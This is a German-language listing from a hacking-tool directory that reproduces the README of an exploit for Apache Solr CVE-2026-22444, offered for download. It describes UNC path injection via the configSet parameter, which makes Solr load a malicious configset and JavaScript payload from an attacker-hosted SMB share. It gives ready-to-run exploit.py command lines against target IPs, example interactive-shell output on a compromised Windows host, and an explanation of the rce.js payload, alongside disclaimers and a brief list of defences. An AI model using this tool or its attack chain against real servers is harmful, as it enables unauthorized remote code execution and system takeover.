Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-22444 — Exploit für Apache Solr CVE-2026-22444, der UNC-Pfad-Injection und einen SMB-Server nutzt, um über eine schädliche Configset- und JavaScript-Payload Remote-Code-Ausführung zu erreichen. | Kitploit
Tools/GitHubGitHub/bfdfhdsfdd-crypto/cve-2026-22444
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHubbfdfhdsfdd-crypto/cve-2026-22444

CVE-2026-22444

Exploit für Apache Solr CVE-2026-22444, der UNC-Pfad-Injection und einen SMB-Server nutzt, um über eine schädliche Configset- und JavaScript-Payload Remote-Code-Ausführung zu erreichen.

Repository anzeigen
vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-22444

Apache Solr UNC-Pfad-Validierungsschwachstelle

Überblick

CVE-2026-22444 ist eine Sicherheitslücke, die Apache Solr betrifft und um den 20. Januar 2026 öffentlich bekannt gegeben wurde. Die Schwachstelle resultiert aus unzureichender Eingabevalidierung (CWE-20: Improper Input Validation) in bestimmten API-Parametern der "create core"-API von Apache Solr, wodurch Angreifer Sicherheitsregeln umgehen können, wenn Solr im "Standalone"-Modus läuft. Dies kann zu Datenlecks, Remote Code Execution (RCE) oder der Offenlegung von NTLM-Hashes führen.

Konkret kann ein Angreifer, wenn Solr keine Authentifizierung aktiviert hat oder der Benutzer über Berechtigungen zum Erstellen von Cores verfügt, diese API durch sorgfältig konstruierte Anfragen missbrauchen, um auf geschützte Dateien zuzugreifen oder bösartige Aktionen auszuführen.

Offenlegungsinformationen

Die Schwachstelle wurde 2025 entdeckt, an Apache gemeldet und auf der oss-security-Mailingliste öffentlich bekannt gegeben:

Offizielle Ankündigung: https://www.openwall.com/lists/oss-security/2026/01/20/5

Technische Details

Die Schwachstelle existiert in CoreContainer.java, wo der CoreDescriptor-Konstruktor Netzwerkoperationen auslöst, bevor die UNC-Pfadvalidierung durchgeführt wird:

  • instancePath.toAbsolutePath() kann UNC-Pfade über das Netzwerk auflösen
  • Die Files.exists()-Prüfung führt Netzwerkaufrufe aus
  • Files.newInputStream() führt Netzwerklesevorgänge aus
  • Die Pfadvalidierung über assertPathAllowed() erfolgt erst nach diesen Operationen

Zeitplan

  • 2025-08-20: Schwachstelle entdeckt und an Apache gemeldet
  • 2026-01-20: Öffentliche Offenlegung

Repository-Inhalt

  • exploit.py - Proof-of-Concept-Exploit-Skript
  • files/ - Unterstützende Dateien für den Exploit (Configset)
    • rce.js - JavaScript-Payload für Remote Code Execution
    • conf/ - Solr-Konfigurationsdateien
      • solrconfig.xml - Definiert die bösartige Update-Processor-Kette
      • schema.xml - Solr-Schema-Definition
      • managed-schema - Verwaltete Schema-Datei
  • requirements.txt - Python-Abhängigkeiten

Verwendungshinweise

Systemanforderungen

  • Python 3.6+
  • Zielsystem muss Apache Solr ausführen (Windows-System, Standalone-Modus)
  • Ziel-Solr hat keine Authentifizierung aktiviert, oder der Angreifer hat Berechtigungen zum Erstellen von Cores

Abhängigkeiten installieren

root@kitploit:~
pip install -r requirements.txt

Die Abhängigkeiten umfassen:

  • requests>=2.25.0 - für HTTP-Anfragen
  • impacket>=0.10.0 - zum Erstellen eines SMB-Servers

Grundlegende Verwendung

1. Grundlegender Angriff (automatische Erkennung der lokalen IP)

root@kitploit:~
python3 exploit.py <Ziel-IP>

Beispiel:

root@kitploit:~
python3 exploit.py 192.168.1.100

2. Solr-Port angeben

root@kitploit:~
python3 exploit.py <Ziel-IP> --port <Port>

Beispiel:

root@kitploit:~
python3 exploit.py 192.168.1.100 --port 8983

3. SMB-Server-Konfiguration angeben

root@kitploit:~
python3 exploit.py <Ziel-IP> --smb-host <SMB-Server-IP> --smb-port <SMB-Port>

Beispiel:

root@kitploit:~
python3 exploit.py 192.168.1.100 --smb-host 192.168.1.50 --smb-port 445

4. Benutzerdefinierter SMB-Freigabename

root@kitploit:~
python3 exploit.py <Ziel-IP> --share-name <Freigabename>

Beispiel:

root@kitploit:~
python3 exploit.py 192.168.1.100 --share-name myshare

Beschreibung der Befehlszeilenargumente

root@kitploit:~
Positionale Argumente:
  target_host           IP-Adresse des Ziel-Solr-Servers

Optionale Argumente:
  -h, --help            Hilfetext anzeigen und beenden
  --port, -p PORT       Solr-Server-Port (Standard: 8983)
  --smb-host SMB_HOST   SMB-Server-IP (Standard: automatische Erkennung der lokalen IP)
  --smb-port SMB_PORT   SMB-Server-Port (Standard: 445)
  --share-name SHARE    SMB-Freigabename (Standard: malicious)

Angriffsablauf

  1. SMB-Server starten: Das Skript startet lokal einen SMB-Server und gibt das Verzeichnis files frei
  2. Bösartigen Core erstellen: Eine Core-Erstellungsanfrage wird an das Ziel-Solr gesendet, die auf das bösartige Configset auf dem SMB-Server verweist
  3. Payload auslösen: Solr lädt die Konfigurationsdateien vom SMB-Server herunter, die bösartigen JavaScript-Code enthalten
  4. Befehle ausführen: Durch das Senden einer Update-Anfrage wird die Ausführung des JavaScript-Payloads ausgelöst
  5. Interaktive Shell: Nach erfolgreichem Exploit wird eine interaktive Befehlsausführungsumgebung bereitgestellt

Verwendung der interaktiven Shell

Nach erfolgreichem Exploit stellt das Skript eine interaktive Shell bereit:

root@kitploit:~
solr> whoami
[+] exit_code: 0, status: success
--- stdout ---
desktop-abc123\user

solr> dir
[+] exit_code: 0, status: success
--- stdout ---
Volume in drive C has no label.
...

solr> exit
[*] exiting shell...

Unterstützte Befehle:

  • Jeder Windows-CMD-Befehl
  • exit oder quit - interaktive Shell beenden
  • Ctrl+C - unterbrechen und beenden

Funktionsweise

Die Schwachstelle nutzt die folgende Technikkette:

  1. UNC-Pfad-Injektion: Injektion eines UNC-Pfads über den configSet-Parameter (z. B. //attacker-ip/share)
  2. SMB-Server: Hostet bösartige Solr-Konfigurationsdateien
  3. JavaScript-RCE: Nutzt die StatelessScriptUpdateProcessorFactory von Solr zur Ausführung von JavaScript-Code
  4. Befehlsausführung: Führt beliebige Befehle über die Java-Runtime-API auf dem Zielsystem aus

Beispiele für erweiterte Verwendung

Vollständiges Parameterbeispiel

root@kitploit:~
python3 exploit.py 192.168.35.31 \
  --port 8983 \
  --smb-host 192.168.35.50 \
  --smb-port 445 \
  --share-name exploit

Erläuterung der Dateistruktur

root@kitploit:~
CVE-2026-22444/
├── exploit.py              # Haupt-Exploit-Skript
├── requirements.txt        # Python-Abhängigkeiten
├── files/                  # Bösartiges Configset
│   ├── rce.js             # RCE-JavaScript-Payload
│   └── conf/              # Solr-Konfigurationsverzeichnis
│       ├── solrconfig.xml # Konfiguriert bösartigen Update-Processor
│       ├── schema.xml     # Schema-Definition
│       └── managed-schema # Verwaltetes Schema
└── README.md              # Diese Datei

Erläuterung des Payloads

rce.js: Dies ist der zentrale RCE-Payload, der:

  • Die Update-Operationen von Solr abfängt (add, delete, commit, rollback)
  • Den cmd-Parameter aus den Anfrageparametern abruft
  • Befehle über die Java-Runtime-API ausführt
  • stdout und stderr erfasst
  • Ausführungsergebnis und Exit-Code zurückgibt

solrconfig.xml: Konfiguriert Solr zur Verwendung der bösartigen Update-Processor-Kette:

  • Definiert die rce-chain-Update-Processor-Kette
  • Verweist auf das rce.js-Skript
  • Setzt den /update-Anfrage-Processor auf die Verwendung dieser Kette

Hinweise

⚠️ Warnung: Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Die unbefugte Verwendung dieses Tools zum Angriff auf Systeme ist illegal.

  • Stellen Sie sicher, dass Sie vor der Verwendung eine ausdrückliche schriftliche Genehmigung einholen
  • Verwenden Sie es nur in Testumgebungen oder in Umgebungen mit rechtlicher Genehmigung
  • Verwenden Sie es nicht auf Produktionssystemen, außer in kontrollierten Penetrationstest-Umgebungen
  • Der Benutzer ist für sein eigenes Handeln verantwortlich

Schutzempfehlungen

  1. Solr aktualisieren: Apache Solr auf eine Version aktualisieren, die die Schwachstelle behebt
  2. Authentifizierung aktivieren: Sicherstellen, dass Solr über einen starken Authentifizierungsmechanismus verfügt
  3. Core-Erstellungsrechte einschränken: Nur vertrauenswürdigen Benutzern die Berechtigung zum Erstellen von Cores erteilen
  4. Netzwerkisolation: Solr in einer geschützten Netzwerkumgebung bereitstellen
  5. Firewall-Regeln: Zugriff auf die Solr-Verwaltungsschnittstelle einschränken
  6. Anomalien überwachen: Überwachung von UNC-Pfadzugriffen und ungewöhnlichen Core-Erstellungsanfragen

Referenzlinks

  • Apache Solr Offizielle Website
  • OSS Security Mailinglisten-Ankündigung
  • CWE-20: Improper Input Validation

Lizenz

Dieses Projekt folgt der MIT-Lizenz. Weitere Details finden Sie in der LICENSE-Datei.

Haftungsausschluss

Dieses Tool und die Informationen dienen ausschließlich Sicherheitsforschungs- und Bildungszwecken. Der Autor übernimmt keine Verantwortung für Schäden, die durch Missbrauch dieser Informationen oder dieses Tools entstehen. Benutzer müssen alle geltenden Gesetze und Vorschriften einhalten und vor der Verwendung eine entsprechende Genehmigung einholen.

Tool herunterladen